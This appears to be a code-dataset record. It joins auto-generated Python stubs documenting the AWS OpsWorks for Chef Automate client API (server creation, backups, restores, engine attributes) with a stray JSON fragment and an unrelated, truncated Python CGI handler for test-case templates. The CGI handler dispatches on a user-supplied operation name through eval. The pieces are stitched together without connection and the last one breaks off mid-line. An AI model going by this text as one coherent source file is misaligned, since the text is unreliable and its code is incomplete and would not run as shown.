\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n'''\n\ndef associate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.associate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\ndef can_paginate(operation_name=None):\n \"\"\"\n Check if an operation can be paginated.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n \"\"\"\n pass\n\ndef create_backup(ServerName=None, Description=None):\n \"\"\"\n Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created.\n Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers.\n This operation is asnychronous.\n By default 50 manual backups can be created.\n A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.create_backup(\n ServerName='string',\n Description='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to back up.\n \n\n :type Description: string\n :param Description: A user-defined description of the backup.\n\n :rtype: dict\n :return: {\n 'Backup': {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\ndef create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=None, ServerName=None, InstanceProfileArn=None, InstanceType=None, KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None, BackupId=None):\n \"\"\"\n Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state.\n This operation is asnychronous.\n A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded.\n When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22.\n By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console.\n See also: AWS API Documentation\n \n \n :example: response = client.create_server(\n DisableAutomatedBackup=True|False,\n Engine='string',\n EngineModel='string',\n EngineVersion='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n BackupRetentionCount=123,\n ServerName='string',\n InstanceProfileArn='string',\n InstanceType='string',\n KeyPair='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string',\n SecurityGroupIds=[\n 'string',\n ],\n ServiceRoleArn='string',\n SubnetIds=[\n 'string',\n ],\n BackupId='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true .\n\n :type Engine: string\n :param Engine: The configuration management engine to use. Valid values include Chef .\n\n :type EngineModel: string\n :param EngineModel: The engine model, or option. Valid values include Single .\n\n :type EngineVersion: string\n :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose.\n\n :type EngineAttributes: list\n :param EngineAttributes: Engine attributes on a specified server.\n Attributes accepted in a createServer request:\n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 .\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters.\n \n\n :type InstanceProfileArn: string\n :param InstanceProfileArn: [REQUIRED]\n The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need.\n \n\n :type InstanceType: string\n :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large .\n\n :type KeyPair: string\n :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH.\n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information.\n Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats:\n HH:MM for daily backups\n DDD:HH:MM for weekly backups\n The specified time is in coordinated universal time (UTC). The default value is a random, daily start time.\n Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type SecurityGroupIds: list\n :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds .\n If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone).\n (string) --\n \n\n :type ServiceRoleArn: string\n :param ServiceRoleArn: [REQUIRED]\n The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need.\n \n\n :type SubnetIds: list\n :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance.\n Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled.\n EC2-VPC customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled.\n For more information about supported Amazon EC2 platforms, see Supported Platforms .\n (string) --\n \n\n :type BackupId: string\n :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\ndef delete_backup(BackupId=None):\n \"\"\"\n Deletes a backup. You can delete both manual and automated backups.\n This operation is asynchronous.\n A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_backup(\n BackupId='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS .\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\ndef delete_server(ServerName=None):\n \"\"\"\n Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted.\n This operation is asynchronous.\n A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_server(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The ID of the server to delete.\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\ndef describe_account_attributes():\n \"\"\"\n Describes your account attributes, and creates requests to increase limits before they are reached or exceeded.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_account_attributes()\n \n \n :rtype: dict\n :return: {\n 'Attributes': [\n {\n 'Name': 'string',\n 'Maximum': 123,\n 'Used': 123\n },\n ]\n }\n \n \n \"\"\"\n pass\n\ndef describe_backups(BackupId=None, ServerName=None, NextToken=None, MaxResults=None):\n \"\"\"\n Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_backups(\n BackupId='string',\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type BackupId: string\n :param BackupId: Describes a single backup.\n\n :type ServerName: string\n :param ServerName: Returns backups for the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Backups': [\n {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\ndef describe_events(ServerName=None, NextToken=None, MaxResults=None):\n \"\"\"\n Describes events for a specified server. Results are ordered by time, with newest events first.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_events(\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server for which you want to view events.\n \n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeEvents again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'ServerEvents': [\n {\n 'CreatedAt': datetime(2015, 1, 1),\n 'ServerName': 'string',\n 'Message': 'string',\n 'LogUrl': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n \"\"\"\n pass\n\ndef describe_node_association_status(NodeAssociationStatusToken=None, ServerName=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.describe_node_association_status(\n NodeAssociationStatusToken='string',\n ServerName='string'\n )\n \n \n :type NodeAssociationStatusToken: string\n :param NodeAssociationStatusToken: [REQUIRED]\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :rtype: dict\n :return: {\n 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatus (string) --\n \n \n \n \"\"\"\n pass\n\ndef describe_servers(ServerName=None, NextToken=None, MaxResults=None):\n \"\"\"\n Lists all configuration management servers that are identified with your account. Only the stored results from Amazon DynamoDB are returned. AWS OpsWorks for Chef Automate does not query other services.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_servers(\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type ServerName: string\n :param ServerName: Describes the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeServers again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Servers': [\n {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\ndef disassociate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.disassociate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\ndef generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n \n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n\n :type Params: dict\n :param Params: The parameters normally passed to\n ClientMethod.\n\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method's model.\n\n \"\"\"\n pass\n\ndef get_paginator(operation_name=None):\n \"\"\"\n Create a paginator for an operation.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n :rtype: L{botocore.paginate.Paginator}\n \"\"\"\n pass\n\ndef get_waiter():\n \"\"\"\n \n \"\"\"\n pass\n\ndef restore_server(BackupId=None, ServerName=None, InstanceType=None, KeyPair=None):\n \"\"\"\n Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work.\n This operation is asynchronous.\n A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.restore_server(\n BackupId='string',\n ServerName='string',\n InstanceType='string',\n KeyPair='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup that you want to use to restore a server.\n \n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to restore.\n \n\n :type InstanceType: string\n :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup.\n\n :type KeyPair: string\n :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key.\n\n :rtype: dict\n :return: {}\n \n \n :returns: \n (dict) --\n \n \"\"\"\n pass\n\ndef start_maintenance(ServerName=None):\n \"\"\"\n Manually starts server maintenance. This command can be useful if an earlier maintenance attempt failed, and the underlying cause of maintenance failure has been resolved. The server will switch to UNDER_MAINTENANCE state, while maintenace is in progress.\n Maintenace can only be started for HEALTHY and UNHEALTHY servers. A InvalidStateException is thrown otherwise. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.start_maintenance(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server on which to run maintenance.\n \n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\ndef update_server(DisableAutomatedBackup=None, BackupRetentionCount=None, ServerName=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=None):\n \"\"\"\n Updates settings for a server.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server(\n DisableAutomatedBackup=True|False,\n BackupRetentionCount=123,\n ServerName='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Setting DisableAutomatedBackup to true disables automated or scheduled backups. Automated backups are enabled by default.\n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: Sets the number of automated backups that you want to keep.\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\ndef update_server_engine_attributes(ServerName=None, AttributeName=None, AttributeValue=None):\n \"\"\"\n Updates engine specific attributes on a specified server. Server will enter the MODIFYING state when this operation is in progress. Only one update can take place at a time.\n This operation can be use to reset Chef Server main API key (CHEF_PIVOTAL_KEY ).\n This operation is asynchronous.\n This operation can only be called for HEALTHY and UNHEALTHY servers. Otherwise a InvalidStateException is raised. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server_engine_attributes(\n ServerName='string',\n AttributeName='string',\n AttributeValue='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type AttributeName: string\n :param AttributeName: [REQUIRED]\n The name of the engine attribute to update.\n \n\n :type AttributeValue: string\n :param AttributeValue: The value to set for the attribute.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n", "step-ids": [ 11, 12, 16, 19, 20 ] }
[ 11, 12, 16, 19, 20 ]
#!/usr/bin/python # -*- coding: utf-8 -*- from tp_global import * from cgibase import cgibase from tp_mongodb import * import json import requests class Ccase_model(cgibase): def __init__(self): return cgibase.__init__(self) def onInit(self): cgibase.SetNoCheckCookie(self) opr = cgibase.onInit(self) if opr is None: return if not hasattr(self, opr): self.out = g_err["input_err"] return eval("self.%s()"%opr) # 新增模版,所需参数opr,name, pid, ip, url, method, type def cmadd(self): self.log.debug("cmadd in.") req = self.input["input"] # 模版名 name = req["name"] # 模版所属项目id pid = req["pid"] # API主机 ip = req["ip"] # 请求url url = req["url"] # 请求方法 method = req["method"] # 请求类型 type = req["type"] # 新增成功则返回模版ID,失败返回空 num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url, method=method, type=type) if num: # 重新查询 total = Case_model().cmquery_total(pid=pid) list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8) self.out = {"status": 0, "total": total, "data": list0} else: self.out = {"status":1} # 查询指定项目模版列表,所需参数opr,pid,page def cmquery(self): self.log.debug("cmquery in.") req = self.input["input"] # 指定项目id pid = req["pid"] # 当前页码数,第一次查询是默认为0 page = req["page"] # 每页显示条数 limitnum = 8 if page: # 数据库查询时跳过的条数 skipnum = 